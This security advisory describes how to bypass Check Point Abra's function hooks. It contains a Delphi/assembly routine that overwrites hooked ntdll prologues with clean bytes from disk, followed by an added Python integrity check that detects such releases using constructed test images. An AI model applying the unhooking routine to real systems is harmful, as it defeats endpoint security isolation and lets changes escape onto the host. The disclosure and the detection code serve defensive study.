Check Point Abra security restriction bypass and information disclosure vulnerability (2)

Interceptor functions can be bypassed by releasing them, that is, by restoring the original code of the hooked function as it was before the modification. The library is read directly from the file system (before a system file can be read this way it must be copied to a temporary folder, and a structured exception handler must be installed). For a library such as ntdll.dll, the first 10-15 bytes of a function are read from the file and written over the prologue of the corresponding function in memory, which is where the jump hook was placed (for example, on ZwLoadDriver).

This technique can, for example, allow file or registry changes made from within the secure session to be written directly to the host system.

// Assumed declaration, not part of the original listing: memcpy is imported
// from msvcrt.dll so that the cdecl calls below resolve.
function memcpy(Dst, Src: Pointer; Len: Cardinal): Pointer; cdecl; external 'msvcrt.dll';

procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);
var
  var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD;
  Dst: array[0..15] of Byte;   // scratch buffer for the 10 prologue bytes (missing from the original listing)
begin
asm
  pushad
   // var_10 = IMAGE_OPTIONAL_HEADER of the clean, file-backed image
   mov     eax, [mapped_dll_base]
   mov     ecx, [eax+3Ch]               // e_lfanew
   mov     edx, [mapped_dll_base]
   lea     eax, [edx+ecx+18h]           // PE signature + 18h = optional header
   mov     [var_10], eax
   // var_4 = IMAGE_EXPORT_DIRECTORY (DataDirectory[0] at optional header + 60h)
   mov     ecx, [var_10]
   mov     edx, [mapped_dll_base]
   add     edx, [ecx+60h]
   mov     [var_4], edx
   // var_8 = AddressOfFunctions, var_20 = AddressOfNames, var_2C = AddressOfNameOrdinals
   mov     eax, [var_4]
   mov     ecx, [mapped_dll_base]
   add     ecx, [eax+1Ch]
   mov     [var_8], ecx
   mov     ecx, [var_4]
   mov     edx, [mapped_dll_base]
   add     edx, [ecx+20h]
   mov     [var_20], edx
   mov     eax, [var_4]
   mov     ecx, [mapped_dll_base]
   add     ecx, [eax+24h]
   mov     [var_2C], ecx
   // var_28 = base of the (hooked) copy already loaded in this process
   push    dllname
   call    LoadLibrary
   mov     [var_28], eax
   cmp     [var_28], 0
   jne     @loc_41D111
   jmp     @ending
@loc_41D111:
   mov     [var_24], 0                  // var_24 = export index
   jmp     @loc_41D135
@loc_41D11A:
   // next export: advance the index, the name pointer and the ordinal pointer
   mov     eax, [var_24]
   add     eax, 1
   mov     [var_24], eax
   mov     ecx, [var_20]
   add     ecx, 4
   mov     [var_20], ecx
   mov     edx, [var_2C]
   add     edx, 2
   mov     [var_2C], edx
@loc_41D135:
   mov     eax, [var_4]
   mov     ecx, [var_24]
   cmp     ecx, [eax+18h]               // stop after NumberOfNames exports
   jnb     @ending
   // pointer to the export name (computed but not used)
   mov     ecx, [var_24]
   mov     edx, [var_20]
   mov     eax, [mapped_dll_base]
   add     eax, [edx]
   // var_3C = function in the live image, Src = same function in the clean image;
   // both use the name index directly rather than the ordinal table
   mov     ecx, [var_24]
   mov     edx, [var_8]
   mov     eax, [var_28]
   add     eax, [edx+ecx*4]
   mov     [var_3C], eax
   mov     ecx, [var_24]
   mov     edx, [var_8]
   mov     eax, [mapped_dll_base]
   add     eax, [edx+ecx*4]
   mov     [Src], eax
   // memcpy(Dst, Src, 0Ah): save the clean prologue
   push    0Ah
   mov     ecx, [Src]
   push    ecx
   lea     edx, [Dst]
   push    edx
   call    memcpy
   add     esp, 0Ch
   // VirtualProtect(var_3C, 0Ah, PAGE_EXECUTE_READWRITE, @old)
   lea     eax, [old]
   push    eax
   push    PAGE_EXECUTE_READWRITE
   push    0Ah
   mov     eax, [var_3C]
   push    eax
   call    VirtualProtect
   // memcpy(var_3C, Dst, 0Ah): write the clean prologue over the hooked one
   push    0Ah
   lea     ecx, [Dst]
   push    ecx
   mov     eax, [var_3C]
   push    eax
   call    memcpy
   add     esp, 0Ch
   jmp     @loc_41D11A
@ending:
  popad
end;
end;
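From the defensive side, the counter-check for this release technique is an integrity check of the hooks themselves: the interception layer snapshots the prologue of each hooked export when it installs the hook and periodically re-reads the live image; any export whose first bytes no longer match the snapshot has been released. The following Python script is an added illustration of that check and is not part of the original advisory or of Check Point's product. It walks a PE32 export directory with the same header offsets the listing above uses (e_lfanew at 3Ch, DataDirectory[0] at optional header + 60h, and the export directory fields at 14h through 24h), resolving the ordinal table instead of assuming ordinal == name index, and diffs the first 10 bytes of every named export between two images. Every image, export name and byte sequence in it is constructed test data, not taken from any real ntdll.dll.

```python
"""Export-prologue integrity check (added illustration, not the advisory's code)."""
import struct

PROLOGUE_LEN = 10  # the listing above copies 0Ah bytes

# Constructed sample exports: (name, original prologue bytes).  Names are
# sorted, as AddressOfNames requires; the bytes are invented, not real ntdll code.
EXPORTS = [
    ("ZwClose",      bytes.fromhex("b819000000ba0003fe7fff12c20400cc")),
    ("ZwLoadDriver", bytes.fromhex("b8e0000000ba0003fe7fff12c20400cc")),
    ("ZwOpenKey",    bytes.fromhex("b877000000ba0003fe7fff12c20c00cc")),
]


def build_image(exports, hooked=()):
    """Build a minimal flat PE32-like image (RVA == offset) with an export table.

    Exports named in `hooked` get a 5-byte JMP rel32 stub written over their
    prologue, modelling an inline jump hook.  Ordinals are assigned in reverse
    order so that a parser assuming ordinal == name index reads the wrong function.
    """
    img = bytearray(0x1000)
    pe = 0x80
    struct.pack_into("<I", img, 0x3C, pe)                          # e_lfanew
    img[pe:pe + 4] = b"PE\0\0"
    opt = pe + 0x18                                                 # IMAGE_OPTIONAL_HEADER
    export_dir = 0x200
    struct.pack_into("<II", img, opt + 0x60, export_dir, 0x100)    # DataDirectory[0]
    funcs, names, ords, strings, code = 0x300, 0x340, 0x380, 0x400, 0x500
    n = len(exports)
    for i, (name, prologue) in enumerate(exports):
        ordinal = n - 1 - i
        func_rva = code + 0x20 * i
        struct.pack_into("<I", img, funcs + 4 * ordinal, func_rva)
        struct.pack_into("<I", img, names + 4 * i, strings)
        struct.pack_into("<H", img, ords + 2 * i, ordinal)
        img[strings:strings + len(name) + 1] = name.encode("ascii") + b"\0"
        strings += len(name) + 1
        body = bytearray(prologue)
        if name in hooked:
            body[:5] = b"\xe9" + struct.pack("<i", 0x100)          # JMP +0x100 (constructed)
        img[func_rva:func_rva + len(body)] = body
    # NumberOfFunctions, NumberOfNames, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    struct.pack_into("<IIIII", img, export_dir + 0x14, n, n, funcs, names, ords)
    return img


def named_exports(image):
    """Yield (name, function_rva) for each named export, resolved via the ordinal table."""
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if bytes(image[e_lfanew:e_lfanew + 4]) != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 0x18
    (export_rva,) = struct.unpack_from("<I", image, opt + 0x60)
    n_funcs, n_names, funcs, names, ords = struct.unpack_from("<IIIII", image, export_rva + 0x14)
    for i in range(n_names):
        (name_rva,) = struct.unpack_from("<I", image, names + 4 * i)
        (ordinal,) = struct.unpack_from("<H", image, ords + 2 * i)
        if ordinal >= n_funcs:
            raise ValueError("ordinal out of range")
        (func_rva,) = struct.unpack_from("<I", image, funcs + 4 * ordinal)
        end = image.index(b"\0", name_rva)
        yield bytes(image[name_rva:end]).decode("ascii"), func_rva


def prologue_diff(reference, observed, length=PROLOGUE_LEN):
    """Return {name: (reference_prologue, observed_prologue)} for every export
    whose first `length` bytes differ between the two images."""
    expected = {n: bytes(reference[r:r + length]) for n, r in named_exports(reference)}
    diffs = {}
    for name, rva in named_exports(observed):
        got = bytes(observed[rva:rva + length])
        if expected.get(name) != got:
            diffs[name] = (expected.get(name), got)
    return diffs


def demo():
    """Snapshot the hooked image, then model a release of the ZwLoadDriver hook
    (original prologue copied back over the JMP stub) and check that it is reported."""
    clean = build_image(EXPORTS)
    hooked = build_image(EXPORTS, hooked=("ZwLoadDriver",))
    released = bytearray(hooked)
    rva = dict(named_exports(clean))["ZwLoadDriver"]
    released[rva:rva + PROLOGUE_LEN] = clean[rva:rva + PROLOGUE_LEN]
    return prologue_diff(hooked, released)


if __name__ == "__main__":
    for name, (before, after) in demo().items():
        print(f"{name}: hook released ({before.hex()} -> {after.hex()})")
```

In a real deployment the reference would be the snapshot the interceptor took right after installing its hooks and the observed image the live module in the process; an empty diff means every hook is still in place, and a non-empty one names the released exports. Because the check compares against the interceptor's own snapshot rather than against the on-disk file, it flags the release regardless of which copy of the library the restored bytes came from.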
